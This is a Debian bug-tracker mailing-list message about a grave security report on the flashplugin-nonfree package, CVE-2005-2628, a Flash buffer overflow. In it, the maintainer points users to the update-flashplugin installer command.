X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 2005-11-15 (=E7=81=AB) =E3=81=AE 09:10 +0100 =E3=81=AB H=C3=A5kan Lindqvi= st =E3=81=95=E3=82=93=E3=81=AF=E6=9B=B8=E3=81=8D=E3=81=BE=E3=81=97=E3=81=9F= : Package: flashplugin-nonfree Version: 7.0.25-5 Severity: grave Tags: security Justification: user security hole =20 =20 Macromedia has released version 7,0,61,0 to fix CVE-2005-2628 (buffer overflow). try update-flashplugin. And this package is just a installer.=20 --=20 Takuo KITAME -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]